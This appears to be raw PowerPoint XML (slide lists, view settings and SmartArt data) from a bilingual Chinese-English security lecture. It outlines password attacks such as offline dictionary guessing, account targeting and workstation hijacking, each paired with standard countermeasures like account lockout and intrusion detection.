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197"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="466" r:id="rId2"/>
    <p:sldId id="535" r:id="rId3"/>
    <p:sldId id="481" r:id="rId4"/>
    <p:sldId id="494" r:id="rId5"/>
    <p:sldId id="595" r:id="rId6"/>
    <p:sldId id="594" r:id="rId7"/>
    <p:sldId id="593" r:id="rId8"/>
    <p:sldId id="495" r:id="rId9"/>
    <p:sldId id="496" r:id="rId10"/>
    <p:sldId id="497" r:id="rId11"/>
    <p:sldId id="559" r:id="rId12"/>
    <p:sldId id="578" r:id="rId13"/>
    <p:sldId id="558" r:id="rId14"/>
    <p:sldId id="555" r:id="rId15"/>
    <p:sldId id="560" r:id="rId16"/>
    <p:sldId id="561" r:id="rId17"/>
    <p:sldId id="556" r:id="rId18"/>
    <p:sldId id="590" r:id="rId19"/>
    <p:sldId id="562" r:id="rId20"/>
    <p:sldId id="472" r:id="rId21"/>
    <p:sldId id="567" r:id="rId22"/>
    <p:sldId id="557" r:id="rId23"/>
    <p:sldId id="563" r:id="rId24"/>
    <p:sldId id="564" r:id="rId25"/>
    <p:sldId id="565" r:id="rId26"/>
    <p:sldId id="566" r:id="rId27"/>
    <p:sldId id="568" r:id="rId28"/>
    <p:sldId id="569" r:id="rId29"/>
    <p:sldId id="570" r:id="rId30"/>
    <p:sldId id="579" r:id="rId31"/>
    <p:sldId id="580" r:id="rId32"/>
    <p:sldId id="591" r:id="rId33"/>
    <p:sldId id="581" r:id="rId34"/>
    <p:sldId id="582" r:id="rId35"/>
    <p:sldId id="583" r:id="rId36"/>
    <p:sldId id="584" r:id="rId37"/>
    <p:sldId id="585" r:id="rId38"/>
    <p:sldId id="586" r:id="rId39"/>
    <p:sldId id="592" r:id="rId40"/>
    <p:sldId id="483" r:id="rId41"/>
    <p:sldId id="484" r:id="rId42"/>
    <p:sldId id="485" r:id="rId43"/>
    <p:sldId id="587" r:id="rId44"/>
    <p:sldId id="588" r:id="rId45"/>
    <p:sldId id="589" r:id="rId46"/>
    <p:sldId id="488" r:id="rId47"/>
    <p:sldId id="489" r:id="rId48"/>
    <p:sldId id="539" r:id="rId49"/>
    <p:sldId id="490" r:id="rId50"/>
    <p:sldId id="491" r:id="rId51"/>
    <p:sldId id="540" r:id="rId52"/>
    <p:sldId id="541" r:id="rId53"/>
    <p:sldId id="492" r:id="rId54"/>
    <p:sldId id="554" r:id="rId55"/>
    <p:sldId id="545" r:id="rId56"/>
    <p:sldId id="546" r:id="rId57"/>
    <p:sldId id="547" r:id="rId58"/>
    <p:sldId id="548" r:id="rId59"/>
    <p:sldId id="493" r:id="rId60"/>
    <p:sldId id="542" r:id="rId61"/>
    <p:sldId id="543" r:id="rId62"/>
    <p:sldId id="482" r:id="rId63"/>
    <p:sldId id="259" r:id="rId64"/>
    <p:sldId id="538" r:id="rId65"/>
    <p:sldId id="536" r:id="rId66"/>
    <p:sldId id="467" r:id="rId67"/>
    <p:sldId id="260" r:id="rId68"/>
    <p:sldId id="333" r:id="rId69"/>
    <p:sldId id="334" r:id="rId70"/>
    <p:sldId id="335" r:id="rId71"/>
    <p:sldId id="341" r:id="rId72"/>
    <p:sldId id="342" r:id="rId73"/>
    <p:sldId id="344" r:id="rId74"/>
    <p:sldId id="345" r:id="rId75"/>
    <p:sldId id="469" r:id="rId76"/>
    <p:sldId id="346" r:id="rId77"/>
    <p:sldId id="347" r:id="rId78"/>
    <p:sldId id="348" r:id="rId79"/>
    <p:sldId id="349" r:id="rId80"/>
    <p:sldId id="350" r:id="rId81"/>
    <p:sldId id="351" r:id="rId82"/>
    <p:sldId id="352" r:id="rId83"/>
    <p:sldId id="353" r:id="rId84"/>
    <p:sldId id="261" r:id="rId85"/>
    <p:sldId id="264" r:id="rId86"/>
    <p:sldId id="354" r:id="rId87"/>
    <p:sldId id="464" r:id="rId88"/>
    <p:sldId id="262" r:id="rId89"/>
    <p:sldId id="265" r:id="rId90"/>
    <p:sldId id="355" r:id="rId91"/>
    <p:sldId id="465" r:id="rId92"/>
    <p:sldId id="356" r:id="rId93"/>
    <p:sldId id="266" r:id="rId94"/>
    <p:sldId id="521" r:id="rId95"/>
    <p:sldId id="470" r:id="rId96"/>
    <p:sldId id="522" r:id="rId97"/>
    <p:sldId id="357" r:id="rId98"/>
    <p:sldId id="358" r:id="rId99"/>
    <p:sldId id="359" r:id="rId100"/>
    <p:sldId id="471" r:id="rId101"/>
    <p:sldId id="360" r:id="rId102"/>
    <p:sldId id="473" r:id="rId103"/>
    <p:sldId id="364" r:id="rId104"/>
    <p:sldId id="367" r:id="rId105"/>
    <p:sldId id="474" r:id="rId106"/>
    <p:sldId id="498" r:id="rId107"/>
    <p:sldId id="269" r:id="rId108"/>
    <p:sldId id="270" r:id="rId109"/>
    <p:sldId id="271" r:id="rId110"/>
    <p:sldId id="390" r:id="rId111"/>
    <p:sldId id="272" r:id="rId112"/>
    <p:sldId id="284" r:id="rId113"/>
    <p:sldId id="285" r:id="rId114"/>
    <p:sldId id="368" r:id="rId115"/>
    <p:sldId id="369" r:id="rId116"/>
    <p:sldId id="370" r:id="rId117"/>
    <p:sldId id="286" r:id="rId118"/>
    <p:sldId id="371" r:id="rId119"/>
    <p:sldId id="372" r:id="rId120"/>
    <p:sldId id="373" r:id="rId121"/>
    <p:sldId id="375" r:id="rId122"/>
    <p:sldId id="376" r:id="rId123"/>
    <p:sldId id="377" r:id="rId124"/>
    <p:sldId id="378" r:id="rId125"/>
    <p:sldId id="379" r:id="rId126"/>
    <p:sldId id="287" r:id="rId127"/>
    <p:sldId id="380" r:id="rId128"/>
    <p:sldId id="288" r:id="rId129"/>
    <p:sldId id="382" r:id="rId130"/>
    <p:sldId id="383" r:id="rId131"/>
    <p:sldId id="384" r:id="rId132"/>
    <p:sldId id="385" r:id="rId133"/>
    <p:sldId id="414" r:id="rId134"/>
    <p:sldId id="415" r:id="rId135"/>
    <p:sldId id="416" r:id="rId136"/>
    <p:sldId id="417" r:id="rId137"/>
    <p:sldId id="420" r:id="rId138"/>
    <p:sldId id="421" r:id="rId139"/>
    <p:sldId id="422" r:id="rId140"/>
    <p:sldId id="423" r:id="rId141"/>
    <p:sldId id="509" r:id="rId142"/>
    <p:sldId id="572" r:id="rId143"/>
    <p:sldId id="573" r:id="rId144"/>
    <p:sldId id="574" r:id="rId145"/>
    <p:sldId id="575" r:id="rId146"/>
    <p:sldId id="576" r:id="rId147"/>
    <p:sldId id="577" r:id="rId148"/>
    <p:sldId id="571" r:id="rId149"/>
    <p:sldId id="374" r:id="rId150"/>
    <p:sldId id="510" r:id="rId151"/>
    <p:sldId id="511" r:id="rId152"/>
    <p:sldId id="512" r:id="rId153"/>
    <p:sldId id="513" r:id="rId154"/>
    <p:sldId id="514" r:id="rId155"/>
    <p:sldId id="515" r:id="rId156"/>
    <p:sldId id="516" r:id="rId157"/>
    <p:sldId id="500" r:id="rId158"/>
    <p:sldId id="424" r:id="rId159"/>
    <p:sldId id="289" r:id="rId160"/>
    <p:sldId id="291" r:id="rId161"/>
    <p:sldId id="549" r:id="rId162"/>
    <p:sldId id="550" r:id="rId163"/>
    <p:sldId id="551" r:id="rId164"/>
    <p:sldId id="517" r:id="rId165"/>
    <p:sldId id="518" r:id="rId166"/>
    <p:sldId id="519" r:id="rId167"/>
    <p:sldId id="520" r:id="rId168"/>
    <p:sldId id="553" r:id="rId169"/>
    <p:sldId id="596" r:id="rId170"/>
    <p:sldId id="597" r:id="rId171"/>
    <p:sldId id="293" r:id="rId172"/>
    <p:sldId id="501" r:id="rId173"/>
    <p:sldId id="295" r:id="rId174"/>
    <p:sldId id="502" r:id="rId175"/>
    <p:sldId id="503" r:id="rId176"/>
    <p:sldId id="504" r:id="rId177"/>
    <p:sldId id="505" r:id="rId178"/>
    <p:sldId id="506" r:id="rId179"/>
    <p:sldId id="507" r:id="rId180"/>
    <p:sldId id="508" r:id="rId181"/>
    <p:sldId id="328" r:id="rId182"/>
    <p:sldId id="329" r:id="rId183"/>
    <p:sldId id="552" r:id="rId184"/>
    <p:sldId id="523" r:id="rId185"/>
    <p:sldId id="524" r:id="rId186"/>
    <p:sldId id="525" r:id="rId187"/>
    <p:sldId id="526" r:id="rId188"/>
    <p:sldId id="527" r:id="rId189"/>
    <p:sldId id="528" r:id="rId190"/>
    <p:sldId id="529" r:id="rId191"/>
    <p:sldId id="530" r:id="rId192"/>
    <p:sldId id="531" r:id="rId193"/>
    <p:sldId id="533" r:id="rId194"/>
    <p:sldId id="534" r:id="rId195"/>
    <p:sldId id="532" r:id="rId196"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6858000" cy="9144000"/>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FF6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18" autoAdjust="0"/>
    <p:restoredTop sz="89194" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="68" d="100"/>
          <a:sy n="68" d="100"/>
        </p:scale>
        <p:origin x="915" y="41"/>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_rels/viewProps.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide134.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide178.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide10.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide176.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide181.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide9.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide174.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide8.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide180.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide136.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide135.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide179.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3BACA8-498D-AC46-B74C-FB0755846CB6}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/default#1" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent0_2" csCatId="mainScheme" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{788CC790-2BD1-2A4C-896B-A17D6105902C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0" dirty="0"/>
            <a:t>工作站劫持</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" i="0" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
            <a:t>Workstation hijacking</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6E5AE24B-A1A1-6045-9938-40E618929542}" type="parTrans" cxnId="{5E0BB7D0-2CE1-1346-9D55-892326D02C33}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{30456D73-8E82-A649-A740-1879C6D33282}" type="sibTrans" cxnId="{5E0BB7D0-2CE1-1346-9D55-892326D02C33}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A5C196C3-A860-0B41-B060-04881B00345D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0"/>
            <a:t>利用用户的错误</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" i="0"/>
        </a:p>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0"/>
            <a:t>Exploiting user mistakes</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" i="0" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{632BA074-B9D5-3A4A-B694-277D2045E3E4}" type="parTrans" cxnId="{91CEB934-47FD-034A-872C-1F58519CE160}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{67906169-6E9D-EF41-8FCD-35A1A08C6554}" type="sibTrans" cxnId="{91CEB934-47FD-034A-872C-1F58519CE160}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7086B77F-B240-5648-A442-9D10D231775A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0"/>
            <a:t>攻击者通常使用社交技术手段获取密码，这些策略会欺骗用户或客户经理透露密码</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" b="1" i="0"/>
            <a:t>; </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0"/>
            <a:t>用户可以有意地共享密码以使同事能够共享文件</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" b="1" i="0"/>
            <a:t>; </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0"/>
            <a:t>用户往往会写下密码，因为很难记住它们</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" i="0" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EF22FF3A-B406-8047-9ACD-ADEEB60599B6}" type="parTrans" cxnId="{69AE8EA3-D9D2-3244-8783-7BEBF764225A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3428C420-129B-1E43-9267-C454E90DF408}" type="sibTrans" cxnId="{69AE8EA3-D9D2-3244-8783-7BEBF764225A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F3AD6313-6439-4146-A5EA-D05864D8A339}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0"/>
            <a:t>离线字典攻击</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" i="0"/>
        </a:p>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0"/>
            <a:t>Offline dictionary attack</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" i="0" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EFF36116-3A09-BD47-B4F9-9ABFA56D831E}" type="parTrans" cxnId="{E476F147-8F08-C748-8920-36FD5F2B12FF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D690D0FC-C144-B741-9875-33646247EF6A}" type="sibTrans" cxnId="{E476F147-8F08-C748-8920-36FD5F2B12FF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BA87DDE1-DBED-CC4A-B387-4D0AD6C44247}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0"/>
            <a:t>有些黑客可以频繁地绕过访问控制并访问系统的密码文件</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" i="0" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3AF69A9B-0362-8F40-8D0F-E32B95A572B2}" type="parTrans" cxnId="{8D9FCA62-D9F2-F94B-ABF4-A523027558A6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{745849C9-7904-7945-82E1-EF07F6E07592}" type="sibTrans" cxnId="{8D9FCA62-D9F2-F94B-ABF4-A523027558A6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9A83CF3E-EFC5-E74F-9B8E-A0DD4FC041EC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0"/>
            <a:t>专用账号攻击</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" i="0"/>
        </a:p>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0"/>
            <a:t>Specific account attack</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" i="0" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C5841981-5DE5-7942-9014-330D5962DCBB}" type="parTrans" cxnId="{9A8AAB5A-41F3-8F4E-93EE-0105E303248E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1ECD39FF-EC3A-9D42-99D6-4551E00B4F0B}" type="sibTrans" cxnId="{9A8AAB5A-41F3-8F4E-93EE-0105E303248E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{613719F2-A867-0F4E-8754-FF62BC4BBBFA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0"/>
            <a:t>攻击者瞄准特定帐户并提交密码猜测，直到发现正确的密码</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" i="0" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{51E6786C-964C-3B45-8027-F9047275062D}" type="parTrans" cxnId="{C7A2424A-5BD6-FD4A-881B-BB048C81126B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B0083B6C-2EA4-D14B-A640-C98F84884711}" type="sibTrans" cxnId="{C7A2424A-5BD6-FD4A-881B-BB048C81126B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2DB8B588-CD56-4C4B-A240-590090493A4D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0"/>
            <a:t>攻击者等待，直到登录的工作站无人值守</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" i="0" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BC115E45-F553-469D-B8A8-95A4A79356EC}" type="parTrans" cxnId="{B46FFA61-181E-49A9-896E-FC4FD7F8B447}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{65DD7E64-3A37-43CC-9C01-603814AC635D}" type="sibTrans" cxnId="{B46FFA61-181E-49A9-896E-FC4FD7F8B447}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C454DADE-95E0-458F-8459-CF287CD49F02}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0" dirty="0"/>
            <a:t>标准对策是在一段时间不活动后自动登录工作站</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3B0C3AD2-C6DA-4AA5-8525-A5370389C765}" type="parTrans" cxnId="{C474A222-2A09-48DD-8957-DD8C76B456B3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED9ECED9-E002-495D-91CA-A4443FD7AA4B}" type="sibTrans" cxnId="{C474A222-2A09-48DD-8957-DD8C76B456B3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3C41424D-1F78-405E-9C3E-0A1027C987DE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0"/>
            <a:t>对策包括用户培训，入侵检测和更简单的密码与其他身份认证机制相结合</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" i="0" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{292F20FE-947B-4D6C-B9B8-52D82857D9E1}" type="parTrans" cxnId="{94B8AD68-1E21-48A8-92A1-90D6166899A0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EF67F55B-3190-49E1-8EAD-1B8C9474FD97}" type="sibTrans" cxnId="{94B8AD68-1E21-48A8-92A1-90D6166899A0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D5BC5DFF-C524-4F13-91C6-E09242C906ED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0"/>
            <a:t>对策包括防止未经授权访问密码文件，入侵检测措施以识别是否被攻破，如果密码文件被泄露，则会快速口令补发</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" i="0" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4C6B5AC6-AF6B-4051-94B4-F4DB82C3D089}" type="parTrans" cxnId="{3506A476-91EE-4E76-8FA3-1E1DCAAA03F5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A8F8689-79A1-4851-B91D-7BB711731F02}" type="sibTrans" cxnId="{3506A476-91EE-4E76-8FA3-1E1DCAAA03F5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A64F989D-2202-42BA-9968-6AE350774484}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0"/>
            <a:t>标准对策是一种帐户锁定机制，可在登录尝试失败后锁定对帐户的访问</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" i="0" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{74977FC0-6F00-4053-91F2-DFD78EF34B1D}" type="parTrans" cxnId="{0A3E37DD-7D46-49F2-B85D-FCC80F637340}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E4E8F640-7415-4355-9FB8-2F496BB4619D}" type="sibTrans" cxnId="{0A3E37DD-7D46-49F2-B85D-FCC80F637340}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{95E667D7-5341-7440-8D3B-896369E0EDF9}" type="pres">
      <dgm:prSet presAssocID="{263BACA8-498D-AC46-B74C-FB0755846CB6}" presName="diagram" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0DE6613E-9542-DD4F-8586-39C0597E59D3}" type="pres">
      <dgm:prSet presAssocID="{788CC790-2BD1-2A4C-896B-A17D6105902C}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F10AEFC9-90B8-B941-B08D-E556BFDCB271}" type="pres">
